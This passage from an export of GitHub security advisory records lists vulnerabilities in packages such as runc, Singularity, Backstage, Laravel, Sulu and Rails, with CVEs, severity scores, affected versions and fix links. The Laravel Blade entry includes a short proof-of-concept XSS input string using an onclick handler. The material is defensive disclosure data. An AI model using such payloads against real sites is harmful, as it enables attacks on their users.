'CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/opencontainers/runc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-rc3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0-rc2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-9962'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/commit/50a19c6ff828c58e5dab13830bd3dacde268afe5'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/commit/5d93fed3d27f1e2bab58bad13b180a7a81d0b378'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/vulnerabilities/cve-2016-9962'}, {'type': 'WEB', 'url': 'https://bugzilla.suse.com/show_bug.cgi?id=1012568#c6'}, {'type': 'WEB', 'url': 'https://github.com/docker/docker/releases/tag/v1.12.6'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BQAXJMMLRU7DD2IMG47SR2K4BOFFG7FZ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FINGBFMIXBG6B6ZWYH3TMRP5V3PDBNXR/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UVM7FCOQMPKOFLDTUYSS4ES76DDM56VP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WUQ3MQNEL5IBZZLMLR72Q4YDCL2SCKRK/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201701-34'}, {'type': 'WEB', 'url': 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9962'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2017-0116.html'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2017-0123.html'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2017-0127.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2017/Jan/21'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2017/Jan/29'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/archive/1/540001/100/0/threaded'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/95361'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T16:22:33Z', 'nvd_published_at': None}" +1.4.0,GHSA-557g-r22w-9wvx,2023-02-28T16:47:09Z,2021-12-20T18:25:33Z,,['CVE-2019-11328'],Incorrect Permission Assignment for Critical Resource in Singularity,"An issue was discovered in Singularity 3.1.0 to 3.2.0-rc2, a malicious user with local/network access to the host system (e.g. ssh) could exploit this vulnerability due to insecure permissions allowing a user to edit files within `/run/singularity/instances/sing//`. The manipulation of those files can change the behavior of the starter-suid program when instances are joined resulting in potential privilege escalation on the host.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/sylabs/singularity'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-11328'}, {'type': 'WEB', 'url': 'https://github.com/sylabs/singularity/commit/618c9d56802399adb329c23ea2b70598eaff4a31'}, {'type': 'WEB', 'url': 'https://github.com/sylabs/singularity/releases/tag/v3.2.0'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5O3TPL5OOTIZEI4H6IQBCCISBARJ6WL3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LIHV7DSEVTB5SUPEZ2UXGS3Q6WMEQSO2/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LNU5BUHFOTYUZVHFUSX2VG4S3RCPUEMA/'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00028.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00059.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2019/05/16/1'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/108360'}]","{'cwe_ids': ['CWE-269', 'CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T15:50:05Z', 'nvd_published_at': '2019-05-14T21:29:00Z'}" +1.4.0,GHSA-mg3m-f475-28hv,2021-11-29T20:22:25Z,2021-12-01T18:28:51Z,,['CVE-2021-43783'],Path Traversal in @backstage/plugin-scaffolder-backend,"### Impact +A malicious actor with write access to a registered scaffolder template is able to manipulate the template in a way that writes files to arbitrary paths on the scaffolder-backend host instance. + +This vulnerability can in some situation also be exploited through user input when executing a template, meaning you do not need write access to the templates. This method will not allow the attacker to control the contents of the injected file however, unless the template is also crafted in a specific way that gives control of the file contents. + +### Patches +This vulnerability is fixed in version `0.15.14` of the `@backstage/plugin-scaffolder-backend`. + +### Workarounds +This attack is mitigated by restricting access and requiring reviews when registering or modifying scaffolder templates. + +### For more information +If you have any questions or comments about this advisory: + +* Open an issue in the [Backstage repository](https://github.com/backstage/backstage) +* Visit our chat, linked to in [Backstage README](https://github.com/backstage/backstage) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': '@backstage/plugin-scaffolder-backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.15.14'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/backstage/backstage/security/advisories/GHSA-mg3m-f475-28hv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43783'}, {'type': 'WEB', 'url': 'https://github.com/backstage/backstage/commit/f9352ab606367cd9efc6ff048915c70ed3013b7f'}, {'type': 'PACKAGE', 'url': 'https://github.com/backstage/backstage'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-29T20:22:25Z', 'nvd_published_at': '2021-11-29T20:15:00Z'}" +1.4.0,GHSA-66hf-2p6w-jqfw,2022-08-11T19:19:57Z,2021-12-08T19:57:36Z,,['CVE-2021-43808'],Laravel Framework XSS in Blade templating engine,"A security researcher has disclosed a possible XSS vulnerability in the Blade templating engine. + +Given the following two Blade templates: + +resources/views/parent.blade.php: + +```html +@section('content') + +@show +``` + +resources/views/child.blade.php: + +```html +@extends('parent') + +@section('content') + +@endsection +``` + +And a route like the following: + +```php +Route::get('/example', function() { + $value = '//localhost/###parent-placeholder-040f06fd774092478d450774f5ba30c5da78acc8## onclick=location.assign(this.value);//'; + + return view('child', ['value' => $value]); +}); +``` + +The broken HTML element may be clicked and the user is taken to another location in their browser due to XSS. This is due to the user being able to guess the parent placeholder SHA-1 hash by trying common names of sections. If the parent template contains an exploitable HTML structure an XSS vulnerability can be exposed. + +This vulnerability has been patched by determining the parent placeholder at runtime and using a random hash that is unique to each request.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'laravel/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.20.42'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'laravel/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.30.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'laravel/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.75.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/laravel/framework/security/advisories/GHSA-66hf-2p6w-jqfw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43808'}, {'type': 'WEB', 'url': 'https://github.com/laravel/framework/pull/39906'}, {'type': 'WEB', 'url': 'https://github.com/laravel/framework/pull/39908'}, {'type': 'WEB', 'url': 'https://github.com/laravel/framework/pull/39909'}, {'type': 'WEB', 'url': 'https://github.com/laravel/framework/commit/b8174169b1807f36de1837751599e2828ceddb9b'}, {'type': 'PACKAGE', 'url': 'https://github.com/laravel/framework'}, {'type': 'WEB', 'url': 'https://github.com/laravel/framework/releases/tag/v6.20.42'}, {'type': 'WEB', 'url': 'https://github.com/laravel/framework/releases/tag/v7.30.6'}, {'type': 'WEB', 'url': 'https://github.com/laravel/framework/releases/tag/v8.75.0'}]","{'cwe_ids': ['CWE-327', 'CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-07T21:33:14Z', 'nvd_published_at': '2021-12-08T00:15:00Z'}" +1.4.0,GHSA-8c9x-wfgj-v78w,2021-12-06T21:57:44Z,2021-12-16T15:31:58Z,,['CVE-2021-4000'],Open Redirect in showdoc,showdoc is vulnerable to URL Redirection to Untrusted Site,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'showdoc/showdoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.9.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4000'}, {'type': 'WEB', 'url': 'https://github.com/star7th/showdoc/commit/c7f10033eba5f2b5a537f9af9ba2379138e67138'}, {'type': 'PACKAGE', 'url': 'https://github.com/star7th/showdoc'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/e4d803e0-3104-432c-80b3-34bc453c8962'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-06T21:57:44Z', 'nvd_published_at': '2021-12-03T11:15:00Z'}" +1.4.0,GHSA-v26w-gcxh-v4r7,2022-06-29T20:42:16Z,2021-12-10T18:50:40Z,,['CVE-2021-25952'],Prototype polluation in just-safe-set,Prototype pollution vulnerability in ‘just-safe-set’ versions 1.0.0 through 2.2.1 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'just-safe-set'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '2.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25952'}, {'type': 'WEB', 'url': 'https://github.com/angus-c/just/pull/267'}, {'type': 'WEB', 'url': 'https://github.com/angus-c/just/commit/dd57a476f4bb9d78c6f60741898dc04c71d2eb53'}, {'type': 'PACKAGE', 'url': 'https://github.com/angus-c/just'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25952'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-07-08T14:23:30Z', 'nvd_published_at': '2021-07-07T12:15:00Z'}" +1.4.0,GHSA-gv87-q66h-4277,2022-01-25T21:02:25Z,2021-12-16T00:02:15Z,,['CVE-2021-43113'],Command injection in itext7-core,iTextPDF in iText before 7.1.17 allows command injection via a CompareTool filename that is mishandled on the gs (aka Ghostscript) command line in GhostscriptHelper.java.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.itextpdf:itext7-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.1.17'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.itextpdf:itextpdf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.5.13.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43113'}, {'type': 'PACKAGE', 'url': 'https://github.com/itext/itext7'}, {'type': 'WEB', 'url': 'https://github.com/itext/itext7/releases/tag/7.1.17'}, {'type': 'WEB', 'url': 'https://github.com/itext/itextpdf/releases/tag/5.5.13.3'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/01/msg00013.html'}, {'type': 'WEB', 'url': 'https://pastebin.com/BXnkY9YY'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5323'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2022-01-25T21:02:25Z', 'nvd_published_at': '2021-12-15T07:15:00Z'}" +1.4.0,GHSA-q4g7-jrxv-67r9,2021-11-30T14:35:55Z,2021-12-02T17:54:25Z,,['CVE-2021-27025'],Silent Configuration Failure in Puppet Agent,A flaw was discovered in Puppet Agent where the agent may silently ignore Augeas settings or may be vulnerable to a Denial of Service condition prior to the first 'pluginsync'.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'puppet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.12.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'puppet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.25.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27025'}, {'type': 'PACKAGE', 'url': 'https://github.com/puppetlabs/puppet'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puppet/CVE-2021-27025.yml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62SELE7EKVKZL4GABFMVYMIIUZ7FPEF7/'}, {'type': 'WEB', 'url': 'https://puppet.com/security/cve/cve-2021-27025'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-30T14:35:55Z', 'nvd_published_at': '2021-11-18T15:15:00Z'}" +1.4.0,GHSA-89q5-mj78-pw5w,2021-11-29T14:53:13Z,2021-12-02T17:52:26Z,,['CVE-2021-23673'],Cross-site Scripting in pekeupload,"This affects all versions of package pekeupload. If an attacker induces a user to upload a file whose name contains javascript code, the javascript code will be executed.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'pekeupload'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23673'}, {'type': 'PACKAGE', 'url': 'https://github.com/moxiecode/plupload'}, {'type': 'WEB', 'url': 'https://github.com/moxiecode/plupload/blob/120cc0b5dd3373d7181fd11b06ac2557c890d3f0/js/jquery.plupload.queue/jquery.plupload.queue.js%23L226'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PEKEUPLOAD-1584360'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-29T14:53:13Z', 'nvd_published_at': '2021-11-22T17:15:00Z'}" +1.4.0,GHSA-jm6p-wfjg-xm7x,2021-12-02T15:29:37Z,2021-12-01T18:26:48Z,,['CVE-2021-4026'],bookstack is vulnerable to Improper Access Control,bookstack is vulnerable to Improper Access Control.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'ssddanbrown/bookstack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.11.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4026'}, {'type': 'WEB', 'url': 'https://github.com/bookstackapp/bookstack/commit/b4fa82e3298a15443ca40bff205b7a16a1031d92'}, {'type': 'WEB', 'url': 'https://github.com/BookStackApp/BookStack/releases/tag/v21.11.2'}, {'type': 'PACKAGE', 'url': 'https://github.com/bookstackapp/bookstack/'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/c6dfa80d-43e6-4b49-95af-cc031bb66b1d'}]","{'cwe_ids': ['CWE-284', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-01T15:23:39Z', 'nvd_published_at': '2021-11-30T20:15:00Z'}" +1.4.0,GHSA-vx6j-pjrh-vgjh,2021-12-15T22:27:31Z,2021-12-15T22:54:20Z,,['CVE-2021-43836'],PHP file inclusion in the Sulu admin panel,"### Impact +_What kind of vulnerability is it? Who is impacted?_ + +An attacker can read arbitrary local files via a PHP file include. In a default configuration this also leads to remote code execution. + +* Compromised components: Arbitrary file read on the server, (Potential) Remote code execution +* Exploitation pre-requisite: User account on the backend + +### Patches + +_Has the problem been patched? What versions should users upgrade to?_ + +The problem is patched with the Versions 1.6.44, 2.2.18, 2.3.8, 2.4.0 + +### Workarounds + +_Is there a way for users to fix or remediate the vulnerability without upgrading?_ + +Overwrite the service `sulu_route.generator.expression_token_provider` and wrap the translator before passing it to the expression language. + +### References + +_Are there any links users can visit to find out more?_ + +Currently not. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [example link to repo](http://example.com) +* Email us at [example email address](mailto:example@example.com) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'sulu/sulu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.44'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sulu/sulu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.2.18'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sulu/sulu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sulu/sulu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0-RC1'}, {'fixed': '2.4.0'}]}], 'versions': ['2.4.0-RC1']}]","[{'type': 'WEB', 'url': 'https://github.com/sulu/sulu/security/advisories/GHSA-vx6j-pjrh-vgjh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43836'}, {'type': 'WEB', 'url': 'https://github.com/sulu/sulu/commit/9c948f9ce350c68b53af8c3910e2cefc7f722b54'}, {'type': 'PACKAGE', 'url': 'https://github.com/sulu/sulu'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-15T22:27:31Z', 'nvd_published_at': '2021-12-15T20:15:00Z'}" +1.4.0,GHSA-xmc8-26q4-qjhx,2023-03-27T15:11:51Z,2021-12-09T19:17:21Z,,['CVE-2020-28491'],Denial of Service (DoS) in Jackson Dataformat CBOR,"This affects the package com.fasterxml.jackson.dataformat:jackson-dataformat-cbor from 2.8.0-rc1 and before 2.11.4, from 2.12.0-rc1 and before 2.12.1. Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.dataformat:jackson-dataformat-cbor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0rc1'}, {'fixed': '2.11.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.dataformat:jackson-dataformat-cbor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.12.0rc1'}, {'fixed': '2.12.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28491'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-dataformats-binary/issues/186'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-dataformats-binary/commit/3d7de83423f8f68f8e9a0c8250084e11818544c7'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-dataformats-binary/commit/de072d314af8f5f269c8abec6930652af67bc8e6'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-dataformats-binary'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONDATAFORMAT-1047329'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T00:43:00Z', 'nvd_published_at': '2021-02-18T16:15:00Z'}" +1.4.0,GHSA-6pqm-xvfc-w7p4,2021-12-03T15:18:52Z,2021-12-03T20:42:35Z,,['CVE-2021-3993'],showdoc is vulnerable to Cross-Site Request Forgery (CSRF),showdoc is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'showdoc/showdoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3993'}, {'type': 'WEB', 'url': 'https://github.com/star7th/showdoc/commit/654e871a3923e79076818a9a03533fe88222c871'}, {'type': 'PACKAGE', 'url': 'https://github.com/star7th/showdoc'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/0aa84736-139b-4ae7-becf-604f7f60b1c9'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-02T21:17:10Z', 'nvd_published_at': '2021-12-01T11:15:00Z'}" +1.4.0,GHSA-2fqw-684c-pvp7,2022-01-04T18:59:02Z,2021-12-17T20:40:50Z,,['CVE-2020-35213'],An issue in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via false link event messages sent to a master ONOS node.,An issue in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via false link event messages sent to a master ONOS node.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.atomix:atomix'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.1.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35213'}, {'type': 'WEB', 'url': 'https://docs.google.com/presentation/d/1i8tVVGE8z9Rtl9UTwktOJpkZwT4kBVLgIk307qMiw_8/edit?usp=sharing'}, {'type': 'PACKAGE', 'url': 'https://github.com/atomix/atomix'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-17T18:42:16Z', 'nvd_published_at': '2021-12-16T20:15:00Z'}" +1.4.0,GHSA-qphc-hf5q-v8fc,2023-08-08T16:59:42Z,2021-12-14T21:19:08Z,,['CVE-2021-44528'],actionpack Open Redirect in Host Authorization Middleware,"Specially crafted ""X-Forwarded-Host"" headers in combination with certain ""allowed host"" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website. + +Impacted applications will have allowed hosts with a leading dot. For example, configuration files that look like this: + +``` +config.hosts << '.EXAMPLE.com' +``` + +When an allowed host contains a leading dot, a specially crafted Host header can be used to redirect to a malicious website. + +This vulnerability is similar to CVE-2021-22881 and CVE-2021-22942. + +Releases +-------- +The fixed releases are available at the normal locations. + +Patches +------- +To aid users who aren't able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset. + +* 6-0-host-authorzation-open-redirect.patch - Patch for 6.0 series +* 6-1-host-authorzation-open-redirect.patch - Patch for 6.1 series +* 7-0-host-authorzation-open-redirect.patch - Patch for 7.0 series + +Please note that only the 6.1.Z, 6.0.Z, and 5.2.Z series are supported at present. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.4.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.4.1'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.1.0'}, {'fixed': '6.1.4.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.1.4.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-44528'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/commit/0fccfb9a3097a9c4260c791f1a40b128517e7815'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/commit/aecba3c301b80e9d5a63c30ea1b287bceaf2c107'}, {'type': 'PACKAGE', 'url': 'https://github.com/rails/rails'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/blob/v6.1.4.2/actionpack/CHANGELOG.md#rails-6142-december-14-2021'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2021-44528.yml'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/ruby-security-ann/c/vG9gz3nk1pM/m/7-NU4MNrDAAJ'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/ruby-security-ann/c/vG9gz3nk1pM/m/7-NU4MNrDAAJ?utm_medium=email&utm_source=footer'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5372'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T21:12:06Z', 'nvd_published_at': '2022-01-10T14:10:00Z'}" +1.4.0,GHSA-9jp8-cwwx-p64q,2021-11-29T20:55:01Z,2021-12-01T18:28:38Z,,[],XSS in richtext custom tag attributes in ezsystems/ezplatform-richtext,"The rich text editor does not escape attribute data when previewing custom tags. This means XSS is possible if custom tags are used, for users who have access to editing rich text content. Frontend content view is not affected, but the vulnerability could be used by editors to attack other editors. The fix ensures custom tag attribute data is escaped in the editor.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezplatform-admin-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.25.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.5.25'}}]","[{'type': 'WEB', 'url': 'https://github.com/ezsystems/ezplatform-admin-ui/security/advisories/GHSA-9jp8-cwwx-p64q'}, {'type': 'WEB', 'url': 'https://developers.ibexa.co/security-advisories/ibexa-sa-2021-010-xss-in-richtext-custom-tag-attributes'}, {'type': 'PACKAGE', 'url': 'https://github.com/ezsystems/ezplatform-admin-ui/'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-29T20:53:06Z', 'nvd_published_at': None}" +1.4.0,GHSA-qc22-qwm9-j8rx,2021-12-20T16:57:06Z,2021-12-20T16:59:31Z,,[],Remote Code Execution in npm-groovy-lint,Versions of npm-groovy-lint prior to 9.1.0 bundle vulnerable versions of the Log4j library which are subject to remote code execution via jndi rendering. As a result npm-groovy-lint prior to 9.1.0 is also vulnerable.,[],"[{'package': {'ecosystem': 'npm', 'name': 'npm-groovy-lint'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nvuillam/npm-groovy-lint/issues/194'}, {'type': 'WEB', 'url': 'https://github.com/nvuillam/npm-groovy-lint/pull/195'}, {'type': 'WEB', 'url': 'https://github.com/nvuillam/npm-groovy-lint/commit/0b664519019442052e0190170c2b1c5aff7d72e7'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-jfh8-c2jp-5v3q'}, {'type': 'PACKAGE', 'url': 